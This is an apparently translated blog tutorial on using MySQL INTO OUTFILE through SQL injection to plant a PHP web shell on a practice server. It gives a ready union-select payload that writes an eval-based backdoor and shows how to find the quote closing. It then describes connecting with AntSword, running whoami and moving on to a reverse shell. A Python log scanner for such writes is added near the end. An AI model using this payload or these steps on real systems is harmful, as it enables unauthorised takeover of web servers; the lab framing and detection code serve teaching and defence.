SQL injection - file upload

Table of contents

First, MySQL file upload points

Second, the file upload command

One-sentence Trojan horse

Third, examples

1. Determine the injection method

2. Test the closing method of the target website

3. Write a one-sentence Trojan horse

4. Take control


First, MySQL file upload points

1. show variables like '%secure%'; is used to check whether MySQL has permission to read and write files.

2. The database's FILE privilege specifies whether the database user may write files to, and read existing files from, the operating system.

3. Requirement for the into outfile command: you must know the full path of a folder on the server where files can be written.

Second, the file upload command

In fact, our ultimate goal is to upload a one-sentence Trojan horse, or any other php file we want to upload, to the target practice range.

Uses of file upload:

(1) The file can be written directly into the website's directory and then connected to directly as a one-sentence Trojan horse.

(2) The target website is found to have a file inclusion vulnerability, and the database also has write permission, so a one-sentence Trojan horse can be written and then used.

One-sentence Trojan horse

?id=-1')) union select 1,2,"<?php @eval($_POST['hyc']); ?>" into outfile "D:\\phpstudy_pro\\WWW\\hyc.php" --+

<?php @eval($_POST['password']);?> is the one-sentence Trojan horse

password stands for the connection password; the password used here is hyc

D:\\phpstudy_pro\\WWW\\ is the file path

hyc.php is the newly inserted file name

Third, examples

1. Determine the injection method

When we pass a value in, the page prompts ...outfile, indicating that file upload injection can be used.

2. Test the closing method of the target website:

However, the error message does not show where the error occurs.

So we use --+ to check whether it is the closing method. The error shown in the figure below remains unchanged, so the closing method is not '.

So we test in more detail:

When we try ')) it works fine.

Of course, there may be some coincidences during testing, such as " appearing to give the same result. This is because the correct closing method, ')), makes the " ineffective.

How do we resolve this?

We can test with and 1=1 and with and 1=2.

Double quote test:

The two results are the same, indicating that " is not the correct closing method.

Single quote and double bracket test:

The two results are different, the false condition is reported as false, so we have found the correct closing method.

Test the number of columns

3. Write a one-sentence Trojan horse

You can see the written Trojan under the target path:

Open it to see what is written inside:

4. Take control

Use AntSword to connect to the target practice range:

After obtaining the right to use the computer, the injection goal is achieved:

You can also use whoami here to see Xiaopi's permissions. I gave it ordinary user permissions, not administrator permissions.

Next, you can upload a larger web shell and use a reverse connection to get a shell.
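
The write in step 3 and the connection in step 4 both leave traces in the web server's access log. The Python sketch below is an added example, not code from the original post: it flags requests whose decoded query string contains into outfile (or MySQL's sibling clause into dumpfile, which goes beyond the case shown above) and then flags later successful requests to the written file name. The log lines, paths and addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (hypothetical paths and addresses).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2023:10:01:02 +0000] "GET /app/?id=1 HTTP/1.1" 200 712',
    '10.0.0.5 - - [12/Mar/2023:10:03:40 +0000] "GET /app/?id=-1%27))%20union%20select%201,2,'
    '%22%3C%3Fphp%20@eval($_POST%5B%27hyc%27%5D);%20%3F%3E%22%20into%20outfile%20'
    '%22D:%5C%5Cphpstudy_pro%5C%5CWWW%5C%5Chyc.php%22%20--+ HTTP/1.1" 200 730',
    '10.0.0.9 - - [12/Mar/2023:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2023:10:05:11 +0000] "POST /hyc.php HTTP/1.1" 200 48',
    '10.0.0.7 - - [12/Mar/2023:10:06:00 +0000] "GET /app/?id=1%20into%20dumpfile%20%27/tmp/x.txt%27 HTTP/1.1" 500 0',
]

REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# INTO OUTFILE / INTO DUMPFILE followed by a quoted destination path.
WRITE = re.compile(r'\binto\s+(?:outfile|dumpfile)\s+["\']([^"\']+)["\']', re.I)
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)

def decode(value, rounds=2):
    """URL-decode up to `rounds` times so nested encoding is normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (line_no, finding, file_name) for file-write SQLi and follow-up requests."""
    findings, written = [], set()
    for line_no, line in enumerate(lines, 1):
        m = REQ.search(line)
        if not m:
            continue
        target, status = m.groups()
        parts = urlsplit(target)
        query = decode(parts.query)
        w = WRITE.search(query)
        if w:
            name = re.split(r'[\\/]+', w.group(1))[-1].lower()  # base name of the written file
            written.add(name)
            kind = "sqli-file-write+php" if PHP_TAG.search(query) else "sqli-file-write"
            findings.append((line_no, kind, name))
            continue
        name = decode(parts.path).rsplit("/", 1)[-1].lower()
        if name in written and status == "200":  # the file exists and was served
            findings.append((line_no, "request-to-written-file", name))
    return findings
```

Only query strings are visible in an access log, so injection carried in POST bodies needs application or database logging instead.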

Origin blog.csdn.net/heyingcheng/article/details/129461703